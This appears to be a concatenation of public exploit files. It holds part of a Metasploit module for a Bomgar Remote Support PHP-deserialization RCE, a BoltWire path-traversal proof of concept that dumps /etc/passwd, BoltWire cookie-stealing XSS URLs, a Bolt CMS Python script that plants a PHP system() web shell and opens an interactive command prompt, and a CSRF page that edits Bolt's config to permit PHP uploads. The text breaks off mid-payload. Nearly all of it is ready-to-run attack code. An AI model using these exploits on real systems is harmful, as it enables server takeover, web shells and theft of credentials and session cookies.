'Name' => 'Bomgar Remote Support Unauthenticated Code Execution',
'Description' => %q{
This module exploits a vulnerability in the Bomgar Remote Support, which
deserializes user provided data using PHP's `unserialize` method.
By providing an specially crafted PHP serialized object, it is possible
to write arbitrary data to arbitrary files. This effectively allows the
execution of arbitrary PHP code in the context of the Bomgar Remote Support
system user.
To exploit the vulnerability, a valid Logging Session ID (LSID) is required.
It consists of four key-value pairs (i. e., 'h=[...];l=[...];m=[...];t=[...]')
and can be retrieved by an unauthenticated user at the end of the process
of submitting a new issue via the 'Issue Submission' form.
Versions before 15.1.1 are reported to be vulnerable.
},
'Author' =>
[
'Markus Wulftange',
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'May 5 2015',
'References' =>
[
['CWE', '94'],
['CWE', '502'],
['CVE', '2015-0935'],
['US-CERT-VU', '978652'],
['URL', 'http://codewhitesec.blogspot.com/2015/05/cve-2015-0935-bomgar-remote-support-portal.html'],
],
'Privileged' => false,
'Targets' =>
[
[ 'Linux x86',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => [ :echo, :printf ]
}
],
[ 'Linux x86_64',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => [ :echo, :printf ]
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true,
'TARGETURI' => '/session_complete',
},
)
register_options(
[
OptString.new('LSID', [true, 'Logging Session ID']),
], self.class
)
end
def check
version = detect_version
if version
print_status("Version #{version} detected")
if version < '15.1.1'
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
print_status("Version could not be detected")
return Exploit::CheckCode::Unknown
end
def exploit
execute_cmdstager
handler
end
def execute_command(cmd, opts)
tmpfile = "/tmp/#{rand_text_alphanumeric(10)}.php"
vprint_status("Uploading payload to #{tmpfile} ...")
upload_php_file(tmpfile, generate_stager_php(cmd))
vprint_status("Triggering payload in #{tmpfile} ...")
execute_php_file(tmpfile)
end
def detect_version
res = send_request_raw(
'uri' => '/'
)
if res and res.code == 200 and res.body.to_s =~ /<!--Product Version: (\d+\.\d+\.\d+)-->/
return $1
end
end
def upload_php_file(filepath, data)
send_pso(generate_upload_file_pso(filepath, data))
end
def execute_php_file(filepath)
send_pso(generate_autoload_pso(filepath))
end
def send_pso(pso)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => {
'lsid' => datastore['LSID'],
'survey' => pso,
}
)
if res
if res.code != 200
fail_with(Failure::UnexpectedReply, "Unexpected response from server: status code #{res.code}")
end
if res.body.to_s =~ />ERROR: ([^<>]+)</
fail_with(Failure::Unknown, "Error occured: #{$1}")
end
else
fail_with(Failure::Unreachable, "Error connecting to the remote server") unless successful
end
res
end
def generate_stager_php(cmd)
"<?php unlink(__FILE__); passthru('#{cmd.gsub(/[\\']/, '\\\\\&')}');"
end
def generate_upload_file_pso(filepath, data)
log_file = PHPObject.new(
"Log_file",
{
"_filename" => filepath,
"_lineFormat" => "",
"_eol" => data,
"_append" => false,
}
)
logger = PHPObject.new(
"Logger",
{
"\0Logger\0_logs" => [ log_file ]
}
)
tracer = PHPObject.new(
"Tracer",
{
"\0Tracer\0_log" => logger
}
)
serialize(tracer)
end
def generate_autoload_pso(filepath)
object = PHPObject.new(
filepath.chomp('.php').gsub('/', '_'),
{}
)
serialize(object)
end
class PHPObject
attr_reader :name, :members
def initialize(name, members)
@name = name
@members = members
end
end
def serialize(value)
case value.class.name.split('::').last
when 'Array' then serialize_array_numeric(value)
when 'Fixnum' then serialize_integer(value)
when 'Float' then serialize_double(value)
when 'Hash' then serialize_array_assoc(value)
when 'Nil' then serialize_nil
when 'PHPObject' then serialize_object(value)
when 'String' then serialize_string(value)
when 'TrueClass', 'FalseClass' then serialize_boolean(value)
else raise "Value of #{value.class} cannot be serialized"
end
end
def serialize_array_numeric(a)
"a:#{a.size}:{" + a.each_with_index.map { |v, i|
serialize_integer(i) + serialize(v)
}.join + "}"
end
def serialize_array_assoc(h)
"a:#{h.size}:{" + h.each_pair.map { |k, v|
serialize_string(k) + serialize(v)
}.join + "}"
end
def serialize_boolean(b)
"b:#{b ? '1' : '0'};"
end
def serialize_double(f)
"d:#{f};"
end
def serialize_integer(i)
"i:#{i};"
end
def serialize_null
"N;"
end
def serialize_object(o)
"O:#{serialize_string(o.name)[2..-2]}:#{serialize_array_assoc(o.members)[2..-1]}"
end
def serialize_string(s)
"s:#{s.size}:\"#{s}\";"
end
end
# Exploit Title: BoltWire 6.03 - Local File Inclusion
# Date: 2020-05-02
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://www.boltwire.com/
# Software Link: https://www.boltwire.com/downloads/go&v=6&r=03
# Version: 6.03
# Tested on: Ubuntu 20.04 LAMP
LFI:
Steps to Reproduce:
1) Using HTTP GET request browse to the following page, whilst being authenticated user.
http://192.168.51.169/boltwire/index.php?p=action.search&action=../../../../../../../etc/passwd
Result
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
[SNIPPED]
source: https://www.securityfocus.com/bid/51422/info
BoltWire is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
BoltWire 3.4.16 is vulnerable; other versions may also be affected.
http://www.example.com/bolt/field/index.php?p=main&help='"</script><script>alert(document.cookie)</script>
http://www.example.com/bolt/field/index.php?"</a><script>alert(document.cookie)</script></
http://www.example.com/bolt/field/index.php?p=main&action='"</a><script>alert(document.cookie)</script></&file=file.jpg
# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution
# Date: 2020-04-05
# Exploit Author: r3m0t3nu11
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.x
# Tested on: Linux
# CVE : not-yet-0day
#!/usr/bin/python
import requests
import sys
import warnings
import re
import os
from bs4 import BeautifulSoup
from colorama import init
from termcolor import colored
init()
#pip install -r requirements.txt
print(colored('''
▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄
▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ ▐░░▌▐░░░░░░░░░░░▌
▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀
▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌
▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄
▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌
▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌
▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░
▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌
▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌
▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀
Pre Auth rce with low credintanl
#Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue"))
if len(sys.argv) != 4:
print((len(sys.argv)))
print((colored("[~] Usage : ./bolt.py url username password","red")))
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
request = requests.session()
print((colored("[+] Retrieving CSRF token to submit the login form","green")))
page = request.get(url+"/bolt/login")
html_content = page.text
soup = BeautifulSoup(html_content, 'html.parser')
token = soup.findAll('input')[2].get("value")
login_info = {
"user_login[username]": username,
"user_login[password]": password,
"user_login[login]": "",
"user_login[_token]": token
}
login_request = request.post(url+"/bolt/login", login_info)
print((colored("[+] Login token is : {0}","green")).format(token))
aaa = request.get(url+"/bolt/profile")
soup0 = BeautifulSoup(aaa.content, 'html.parser')
token0 = soup0.findAll('input')[6].get("value")
data_profile = {
"user_profile[password][first]":"password",
"user_profile[password][second]":"password",
"user_profile[email]":"a@a.com",
"user_profile[displayname]":"<?php system($_GET['test']);?>",
"user_profile[save]":"",
"user_profile[_token]":token0
}
profile = request.post(url+'/bolt/profile',data_profile)
cache_csrf = request.get(url+"/bolt/overview/showcases")
soup1 = BeautifulSoup(cache_csrf.text, 'html.parser')
csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token")
asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true")
soup2 = BeautifulSoup(asyncc.text, 'html.parser')
tables = soup2.find_all('span', class_ = 'entry disabled')
print((colored("[+] SESSION INJECTION ","green")))
for all_tables in tables:
f= open("session.txt","a+")
f.write(all_tables.text+"\n")
f.close()
num_lines = sum(1 for line in open('session.txt'))
renamePostData = {
"namespace": "root",
"parent": "/app/cache/.sessions",
"oldname": all_tables.text,
"newname": "../../../public/files/test{}.php".format(num_lines),
"token": csrf
}
rename = request.post(url+"/async/folder/rename", renamePostData)
try:
url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines)
rev = requests.get(url1).text
r1 = re.findall('php',rev)
r2 = r1[0]
if r2 == "php" :
fileINJ = "test{}".format(num_lines)
print((colored("[+] FOUND : "+fileINJ,"green")))
except IndexError:
print((colored("[-] Not found.","red")))
new_name = 0
while new_name != 'quit':
inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red"))
if inputs == "quit" :
exit()
else:
a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))
aa = a.text
r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)
print((r11)[0])
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function exploit() {
var target = "http://127.0.0.1"
var bolt_admin_url = target + "/bolt";
var xhr = new XMLHttpRequest();
xhr.open("POST", bolt_admin_url + "/upload", true);
xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------130713229751679908527494159");
xhr.withCredentials = true;
var body = "-----------------------------130713229751679908527494159\r\n" +
"Content-Disposition: form-data; name=\"files[]\"; filename=\"stager.html\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"\x3cscript\x3e\r\n" +
"\r\n" +
"function exploit(){\r\n" +
"\r\n" +
" var bolt_admin_url = \""+bolt_admin_url+"\";\r\n" +
"\r\n" +
" var xhr = new XMLHttpRequest();\r\n" +
" \r\n" +
" if(xhr) {\r\n" +
" xhr.open(\'GET\', bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" +
" xhr.onreadystatechange = handler;\r\n" +
" xhr.send();\r\n" +
" }\r\n" +
"\r\n" +
" function handler(){\r\n" +
" if (xhr.readyState == 4 && xhr.status == 200) {\r\n" +
" user_page = document.createElement(\'html\');\r\n" +
" user_page.innerHTML = xhr.responseText;\r\n" +
" token_input = (user_page.getElementsByTagName(\'input\')[0]).value;\r\n" +
" console.log(\"Token obtained:\" + token_input);\r\n" +
" ModifyAllowedExtensions(token_input);\r\n" +
" UploadShell();\r\n" +
" }\r\n" +
" }\r\n" +
"\r\n" +
" function ModifyAllowedExtensions(token) {\r\n" +
"\r\n" +
" var xhr = new XMLHttpRequest();\r\n" +
" xhr.open(\"POST\", bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" +
" xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" +
" xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" +
" xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n" +
" xhr.withCredentials = true;\r\n" +
" var body = \"file_edit%5B_token%5D=\"+token+\"&file_edit%5Bcontents%5D=%23+Database+setup.+The+driver+can+be+either+\\\'sqlite\\\'%2C+\\\'mysql\\\'+or+\\\'postgres\\\'.%0D%0A%23%0D%0A%23+For+SQLite%2C+only+the+databasename+is+required.+However%2C+MySQL+and+PostgreSQL%0D%0A%23+also+require+\\\'username\\\'%2C+\\\'password\\\'%2C+and+optionally+\\\'host\\\'+(+and+\\\'port\\\'+)+if+the+database%0D%0A%23+server+is+not+on+the+same+host+as+the+web+server.%0D%0A%23%0D%0A%23+If+you\\\'re+trying+out+Bolt%2C+just+keep+it+set+to+SQLite+for+now.%0D%0Adatabase%3A%0D%0A++++driver%3A+sqlite%0D%0A++++databasename%3A+bolt%0D%0A%0D%0A%23+The+name+of+the+website%0D%0Asitename%3A+A+sample+site%0D%0Apayoff%3A+The+amazing+payoff+goes+here%0D%0A%0D%0A%23+The+theme+to+use.%0D%0A%23%0D%0A%23+Don\\\'t+edit+the+provided+templates+directly%2C+because+they+_will_+get+updated%0D%0A%23+in+next+releases.+If+you+wish+to+modify+a+default+theme%2C+copy+its+folder%2C+and%0D%0A%23+change+the+name+here+accordingly.%0D%0Atheme%3A+base-2018%0D%0A%0D%0A%23+The+locale+that\\\'ll+be+used+by+the+application.+If+no+locale+is+set+the%0D%0A%23+fallback+locale+is+\\\'en_GB\\\'.+For+available+options%2C+see%3A%0D%0A%23+https%3A%2F%2Fdocs.bolt.cm%2Fother%2Flocales%0D%0A%23%0D%0A%23+In+some+cases+it+may+be+needed+to+specify+(non-standard)+variations+of+the%0D%0A%23+locale+to+get+everything+to+work+as+desired.%0D%0A%23%0D%0A%23+This+can+be+done+as+%5Bnl_NL%2C+Dutch_Netherlands%5D+when+specifying+multiple%0D%0A%23+locales%2C+ensure+the+first+is+a+standard+locale.%0D%0Alocale%3A+en_GB%0D%0A%0D%0A%23+Set+the+timezone+to+be+used+on+the+website.+For+a+list+of+valid+timezone%0D%0A%23+settings%2C+see%3A+http%3A%2F%2Fphp.net%2Fmanual%2Fen%2Ftimezones.php%0D%0A%23+timezone%3A+UTC%0D%0A%0D%0A%23+Set+maintenance+mode+on+or+off.%0D%0A%23%0D%0A%23+While+in+maintenance+mode%2C+only+users+of+level+editor+or+higher+can+access+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+All+other+visitors+are+presented+with+a+notice+that+the+site+is+currently%0D%0A%23+offline.%0D%0A%23%0D%0A%23+The+default+template+file+can+be+found+in+%2Fapp%2Ftheme_defaults%2F+and+overridden%0D%0A%23+with+this+option+using+your+own+theme.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Amaintenance_mode%3A+false%0D%0Amaintenance_template%3A+maintenance_default.twig%0D%0A%0D%0A%23+The+hour+of+the+day+for+the+internal+cron+task+scheduler+to+run+daily%2C+weekly%2C%0D%0A%23+monthly+and+yearly+jobs.%0D%0A%23%0D%0A%23+Default%3A+3+(3+am)%0D%0Acron_hour%3A+3%0D%0A%0D%0A%23+If+your+site+is+reachable+under+different+urls+(say%2C+both+blog.example.org%2F%0D%0A%23+as+well+as+example.org%2F)%2C+it\\\'s+a+good+idea+to+set+one+of+these+as+the%0D%0A%23+canonical%2C+so+it\\\'s+clear+which+is+the+primary+address+of+the+site.%0D%0A%23%0D%0A%23+If+you+include+%60https%3A%2F%2F%60%2C+it+will+be+included+in+the+canonical+urls.%0D%0A%23canonical%3A+example.org%0D%0A%0D%0A%23+Bolt+can+insert+a+%3Clink+rel%3D%22shortcut+icon%22%3E+for+all+pages+on+the+site.%0D%0A%0D%0A%23+Note%3A+The+location+given+is+relative+to+the+currently+selected+theme.+If%0D%0A%23+++++++you+want+to+set+the+icon+yourself%2C+just+don\\\'t+enable+the+following+line.%0D%0A%23favicon%3A+images%2Ffavicon-bolt.ico%0D%0A%0D%0A%23+The+default+content+to+use+for+the+homepage%2C+and+the+template+to+render+it%0D%0A%23+with.+This+can+either+be+a+specific+record+(like+%60page%2F1%60)+or+a+listing+of%0D%0A%23+records+(like+%60entries%60).+In+the+chosen+\\\'homepage_template\\\'%2C+you+will+have%0D%0A%23+%60record%60+or+%60records%60+at+your+disposal%2C+depending+on+the+\\\'homepage\\\'+setting.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on%0D%0A%23+++++++the+website%2C+be+sure+to+check+for+a+theme.yml+file+in+your+theme\\\'s%0D%0A%23+++++++folder.+If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Ahomepage%3A+homepage%2F1%0D%0Ahomepage_template%3A+index.twig%0D%0A%0D%0A%23+The+default+content+for+the+404+page.+Can+be+an+(array+of)+template+names+or%0D%0A%23+identifiers+for+records%2C+which+will+be+tried+until+a+match+is+found.%0D%0A%23%0D%0A%23+Note%3A+The+record+specified+in+this+parameter+must+be+set+to+\\\'published\\\'.%0D%0Anotfound%3A+%5B+not-found.twig%2C+block%2F404-not-found+%5D%0D%0A%0D%0A%23+The+default+template+for+single+record+pages+on+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+Can+be+overridden+for+each+contenttype+and+for+each+record%2C+if+it+has+a%0D%0A%23+\\\'templateselect\\\'+field.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Arecord_template%3A+record.twig%0D%0A%0D%0A%23+The+default+template+and+amount+of+records+to+use+for+listing-pages+on+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+Can+be+overridden+for+each+contenttype.%0D%0A%23%0D%0A%23+Note+1%3A+Sorting+on+TAXONOMY-pages+will+give+unexpected+results%2C+if+it+has+a%0D%0A%23+++++++++pager.%0D%0A%23+++++++++If+you+need+sorting+on+those%2C+make+sure+you+display+all+the+records+on+one%0D%0A%23+++++++++page.%0D%0A%23%0D%0A%23+Note+2%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s%0D%0A%23+++++++++folder.+If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Alisting_template%3A+listing.twig%0D%0Alisting_records%3A+6%0D%0Alisting_sort%3A+datepublish+DESC%0D%0A%0D%0A%23+Because+of+limitations+on+how+the+underlying+database+queries+work%2C+there+are%0D%0A%23+only+two+options+for+sorting+on+taxonomies.+\\\'ASC\\\'+for+roughly+%22oldest+first%22%0D%0A%23+and+\\\'DESC\\\'+for+roughly+\\\'newest+first\\\'.%0D%0Ataxonomy_sort%3A+DESC%0D%0A%0D%0A%23+Template+for+showing+the+search+results.+If+not+defined%2C+uses+the+settings+for%0D%0A%23+listing_template+and+listing_records.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Asearch_results_template%3A+search.twig%0D%0Asearch_results_records%3A+10%0D%0A%0D%0A%23+Add+jQuery+to+the+rendered+HTML%2C+whether+or+not+it\\\'s+added+by+an+extension.%0D%0Aadd_jquery%3A+false%0D%0A%0D%0A%23+The+default+amount+of+records+to+show+on+overview+pages.+Can+be+overridden%0D%0A%23+for+each+contenttype.%0D%0Arecordsperpage%3A+10%0D%0A%0D%0A%23+Settings+for+caching+in+parts+of+Bolt.%0D%0A%23+-+config%3A++++++++Caches+the+parsed+.yml+files+from+%2Fapp%2Fconfig.+It\\\'s+updated%0D%0A%23++++++++++++++++++immediately+when+one+of+the+files+changes+on+disk.+There%0D%0A%23++++++++++++++++++should+be+no+good+reason+to+turn+this+off.%0D%0A%23%0D%0A%23+-+templates%3A+++++Caches+rendered+templates.%0D%0A%23%0D%0A%23+-+request%3A+++++++Caches+rendered+pages+in+the+configured+HTTP+reverse+proxy%0D%0A%23++++++++++++++++++cache%2C+on+GET+%26+HEAD+requests.%0D%0A%23++++++++++++++++++By+default+this+is+handled+by+Syfmony+HTTP+Cache.%0D%0A%23%0D%0A%23+-+duration%3A++++++The+duration+(in+minutes)+for+the+\\\'templates\\\'+and+\\\'request\\\'%0D%0A%23++++++++++++++++++options.+default+is+10+minutes.+Note+that+the+duration+is+set%0D%0A%23++++++++++++++++++on+storing+the+cache.+By+lowering+this+value+you+will+not%0D%0A%23++++++++++++++++++invalidate+currently+cached+items.%0D%0A%23%0D%0A%23+-+authenticated%3A+Cache+\\\'templates\\\'+and+\\\'request\\\'+for+logged-on+users.+In+most%0D%0A%23++++++++++++++++++cases+you+should+*NOT*+enable+this%2C+because+it+will+cause%0D%0A%23++++++++++++++++++side-effects+if+the+website+shows+different+content+to%0D%0A%23++++++++++++++++++authenticated+users.%0D%0A%23%0D%0A%23+-+thumbnails%3A++++Caches+thumbnail+generation.%0D%0A%23%0D%0A%23+-+translations%3A++Caches+translation+files.+It+is+recommend+to+leave+this%0D%0A%23++++++++++++++++++enabled.+Only+if+you+develop+extensions+and+work+with%0D%0A%23++++++++++++++++++translation+files+you+should+turn+this+off.%0D%0Acaching%3A%0D%0A++++config%3A+true%0D%0A++++templates%3A+true%0D%0A++++request%3A+false%0D%0A++++duration%3A+10%0D%0A++++authenticated%3A+false%0D%0A++++thumbnails%3A+true%0D%0A++++translations%3A+true%0D%0A%0D%0A%23+Set+\\\'enabled\\\'+to+\\\'true\\\'+to+log+all+content+changes+in+the+database.%0D%0A%23%0D%0A%23+Unless+you+need+to+rigorously+monitor+every+change+to+your+site\\\'s+content%2C+it%0D%0A%23+is+recommended+to+keep+this+disabled.%0D%0Achangelog%3A%0D%0A++++enabled%3A+false%0D%0A%0D%0A%23+Default+settings+for+thumbnails.%0D%0A%23%0D%0A%23+Quality+should+be+between+0+(horrible%2C+small+file)+and+100+(best%2C+huge+file).%0D%0A%23%0D%0A%23+cropping%3A+++++++++++One+of+either+crop%2C+fit%2C+borders%2C+resize.%0D%0A%23+default_thumbnail%3A++The+default+size+of+images%2C+when+using%0D%0A%23+++++++++++++++++++++%7B%7B+record.image%7Cthumbnail()+%7D%7D%0D%0A%23+default_image%3A++++++The+default+size+of+images%2C+when+using%0D%0A%23+++++++++++++++++++++%7B%7B+record.image%7Cimage()+%7D%7D%0D%0A%23+allow_upscale%3A++++++Determines+whether+small+images+will+be+enlarged+to+fit%0D%0A%23+++++++++++++++++++++the+requested+dimensions.%0D%0A%23+browser_cache_time%3A+Sets+the+amount+of+seconds+that+the+browser+will+cache%0D%0A%23+++++++++++++++++++++images+for.+Set+it+to+activate+browser+caching.%0D%0A%23%0D%0A%23+Note%3A+If+you+change+these+values%2C+you+might+need+to+clear+the+cache+before%0D%0A%23+++++++they+show+up.%0D%0Athumbnails%3A%0D%0A++++default_thumbnail%3A+%5B+160%2C+120+%5D%0D%0A++++default_image%3A+%5B+1000%2C+750+%5D%0D%0A++++quality%3A+80%0D%0A++++cropping%3A+crop%0D%0A++++notfound_image%3A+bolt_assets%3A%2F%2Fimg%2Fdefault_notfound.png%0D%0A++++error_image%3A+bolt_assets%3A%2F%2Fimg%2Fdefault_error.png%0D%0A++++save_files%3A+false%0D%0A++++allow_upscale%3A+false%0D%0A++++exif_orientation%3A+true%0D%0A++++only_aliases%3A+false%0D%0A%23++++browser_cache_time%3A+2592000%0D%0A%0D%0A%23+Define+the+HTML+tags+and+attributes+that+are+allowed+in+\\\'cleaned\\\'+HTML.+This%0D%0A%23+is+used+for+sanitizing+HTML%2C+to+make+sure+there+are+no+undesirable+elements%0D%0A%23+left+in+the+content+that+is+shown+to+users.+For+example%2C+tags+like+%60%3Cscript%3E%60%0D%0A%23+or+%60onclick%60-attributes.%0D%0A%23+Note%3A+enabling+options+in+the+%60wysiwyg%60+settings+will+implicitly+add+items+to%0D%0A%23+the+allowed+tags.+For+example%2C+if+you+set+%60images%3A+true%60%2C+the+%60%3Cimg%3E%60+tag%0D%0A%23+will+be+allowed%2C+regardless+of+it+being+in+the+%60allowed_tags%60+setting.%0D%0Ahtmlcleaner%3A%0D%0A++++allowed_tags%3A+%5B+div%2C+span%2C+p%2C+br%2C+hr%2C+s%2C+u%2C+strong%2C+em%2C+i%2C+b%2C+li%2C+ul%2C+ol%2C+mark%2C+blockquote%2C+pre%2C+code%2C+tt%2C+h1%2C+h2%2C+h3%2C+h4%2C+h5%2C+h6%2C+dd%2C+dl%2C+dt%2C+table%2C+tbody%2C+thead%2C+tfoot%2C+th%2C+td%2C+tr%2C+a%2C+img%2C+address%2C+abbr%2C+iframe%2C+caption%2C+sub%2C+sup%2C+figure%2C+figcaption+%5D%0D%0A++++allowed_attributes%3A+%5B+id%2C+class%2C+style%2C+name%2C+value%2C+href%2C+src%2C+alt%2C+title%2C+width%2C+height%2C+frameborder%2C+allowfullscreen%2C+scrolling%2C+target%2C+colspan%2C+rowspan+%5D%0D%0A%0D%0A%23+Uploaded+file+handling%0D%0A%23%0D%0A%23+You+can+change+the+pattern+match+and+replacement+on+uploaded+files+and+if+the%0D%0A%23+resulting+filename+should+be+transformed+to+lower+case.%0D%0A%23%0D%0A%23+Setting+\\\'autoconfirm%3A+true\\\'+prevents+the+creation+of+temporary+lock+files%0D%0A%23+while+uploading.%0D%0A%23%0D%0A%23+upload%3A%0D%0A%23+++++pattern%3A+\\\'%5B%5EA-Za-z0-9%5C.%5D%2B\\\'%0D%0A%23+++++replacement%3A+\\\'-\\\'%0D%0A%23+++++lowercase%3A+true%0D%0A%23+++++autoconfirm%3A+false%0D%0A%0D%0A%23+Define+the+file+types+(extensions+to+be+exact)+that+are+acceptable+for+upload%0D%0A%23+in+either+\\\'file\\\'+fields+or+through+the+\\\'files\\\'+screen.%0D%0Aaccept_file_types%3A+%5B+php%2C+twig%2C+html%2C+js%2C+css%2C+scss%2C+gif%2C+jpg%2C+jpeg%2C+png%2C+ico%2C+zip%2C+tgz%2C+txt%2C+md%2C+doc%2C+docx%2C+pdf%2C+epub%2C+xls%2C+xlsx%2C+ppt%2C+pptx%2C+mp3%2C+ogg%2C+wav%2C+m4a%2C+mp4%2C+m4v%2C+ogv%2C+wmv%2C+avi%2C+webm%2C+svg%5D%0D%0A%0D%0A%23+Alternatively%2C+if+you+wish+to+limit+these%2C+uncomment+the+following+list%0D%0A%23+instead.+It+just+includes+file+types+%2F+extensions+that+are+harder+to+exploit.%0D%0A%23+accept_file_types%3A+%5B+gif%2C+jpg%2C+jpeg%2C+png%2C+txt%2C+md%2C+pdf%2C+epub%2C+mp3%2C+svg+%5D%0D%0A%0D%0A%23+If+you+want+to+\\\'brand\\\'+the+Bolt+backend+for+a+client%2C+you+can+change+some+key%0D%0A%23+variables+here%2C+that+determine+the+name+of+the+backend%2C+and+adds+a+primary%0D%0A%23+support%2Fcontact+link+to+the+footer.++Add+a+scheme%2C+like+%60mailto%3A%60+or%0D%0A%23+%60https%3A%2F%2F%60+to+the+email+or+URL.%0D%0A%23%0D%0A%23+Additionally+you+can+change+the+mount+point+for+the+backend%2C+either+for%0D%0A%23+convenience+or+to+obscure+it+from+prying+eyes.%0D%0A%23%0D%0A%23+The+Bolt+backend+is+accessible+as+%60%2Fbolt%2F%60+by+default.+If+you+change+it+here%2C%0D%0A%23+it+will+only+be+accessible+through+the+value+set+in+\\\'path\\\'.%0D%0A%23+Keep+the+path+simple%3A+lowercase+only%2C+no+extra+slashes+or+other+special%0D%0A%23+characters.%0D%0A%23+branding%3A%0D%0A%23+++++name%3A+SuperCMS%0D%0A%23+++++path%3A+%2Fadmin%0D%0A%23+++++provided_by%3A+%5B+supercool%40example.org%2C+%22Supe